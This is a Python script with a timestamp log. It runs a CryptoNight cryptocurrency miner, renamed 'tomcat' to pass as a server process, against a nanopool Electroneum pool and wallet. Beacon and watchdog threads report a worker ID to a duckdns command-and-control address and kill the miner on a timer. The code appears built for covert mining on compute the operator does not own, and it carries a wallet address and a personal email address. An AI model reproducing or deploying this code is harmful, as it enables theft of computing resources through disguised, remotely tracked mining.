import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:04.845782
#2018-02-17 16:30:09.674732
#2018-02-17 18:19:04.653378
#2018-02-17 20:07:05.295013
#2018-02-17 21:54:05.090374
#2018-02-17 23:39:04.333762
#2018-02-18 01:28:04.768097
#2018-02-18 03:15:07.832730
#2018-02-18 05:04:01.314487
#2018-02-18 06:56:07.565416
#2018-02-18 08:46:04.245764
#2018-02-18 10:33:06.281171
#2018-02-18 12:18:05.785576
#2018-02-18 14:05:07.138753
#2018-02-18 15:56:05.215745
#2018-02-18 17:46:01.910385
#2018-02-18 20:44:06.871180
#2018-02-18 22:29:05.823045
#2018-02-19 00:18:07.296854
#2018-02-19 02:04:07.601944
#2018-02-19 03:51:05.359420
#2018-02-19 05:35:08.628929
#2018-02-19 07:23:04.833544
#2018-02-19 09:14:06.083642
#2018-02-19 11:03:07.440165
#2018-02-19 12:50:10.462840
#2018-02-19 14:38:03.119793
#2018-02-19 16:25:10.277683
#2018-02-19 18:13:07.208186
#2018-02-19 19:59:05.868307
#2018-02-19 21:48:02.136219
#2018-02-19 23:35:08.479906
#2018-02-20 01:22:05.847632
#2018-02-20 03:12:01.988261
#2018-02-20 04:59:01.360467
#2018-02-20 06:41:01.520513
#2018-02-20 08:27:03.758939
#2018-02-20 10:12:06.472055
#2018-02-20 11:56:07.713849
#2018-02-20 13:45:08.975218
#2018-02-20 15:30:01.427828
#2018-02-20 17:17:09.675912
#2018-02-20 19:08:09.769367
#2018-02-20 20:56:04.115994
#2018-02-20 22:40:04.524546
#2018-02-21 00:23:06.254075
#2018-02-21 02:08:08.315029
#2018-02-21 03:55:03.003944
#2018-02-21 05:42:06.735887
#2018-02-21 07:30:04.068656
#2018-02-21 09:15:02.096385
#2018-02-21 11:03:06.463924
#2018-02-21 12:51:07.377497
#2018-02-21 14:39:01.443644
#2018-02-21 16:26:09.320858
#2018-02-21 18:18:02.163626
#2018-02-21 20:03:01.466584
#2018-02-21 21:49:05.134793
#2018-02-21 23:42:06.308095
#2018-02-22 01:33:05.244316
#2018-02-22 03:20:08.451606
#2018-02-22 05:09:01.625278
#2018-02-22 06:52:01.627702
#2018-02-22 08:40:10.666805
#2018-02-22 10:27:08.314094
#2018-02-22 12:12:04.097734
#2018-02-22 13:57:06.707349
#2018-02-22 15:44:05.943491
#2018-02-22 17:31:04.617715
#2018-02-22 19:19:01.220837
#2018-02-22 21:10:05.986729
#2018-02-22 22:54:02.095464
#2018-02-23 00:41:08.370118
#2018-02-23 02:27:04.999815
#2018-02-23 04:16:06.240172
#2018-02-23 06:01:05.321891
#2018-02-23 07:31:07.131678
#2018-02-23 09:31:04.488077
#2018-02-23 11:17:07.393784
#2018-02-23 12:35:03.963160
#2018-02-23 14:00:07.917540
#2018-02-23 15:35:10.878739
#2018-02-23 17:08:08.996431
#2018-02-23 18:37:02.122419
#2018-02-23 20:17:06.864276
#2018-02-23 21:49:04.681551
#2018-02-23 23:28:04.170396
#2018-02-24 01:05:07.515403
#2018-02-24 02:46:08.184335
#2018-02-24 04:22:03.832083
#2018-02-24 05:49:07.249334
#2018-02-24 07:23:04.354792
#2018-02-24 08:57:06.764684
#2018-02-24 10:27:04.911141
#2018-02-24 12:09:07.012049
#2018-02-24 13:40:05.590398
#2018-02-24 15:11:04.153932
#2018-02-24 16:44:02.146021
#2018-02-24 18:18:05.347319
#2018-02-24 19:48:02.144381
#2018-02-24 21:20:07.412746
#2018-02-25 01:18:04.200049
#2018-02-25 05:18:01.376523
#2018-02-25 11:26:01.588804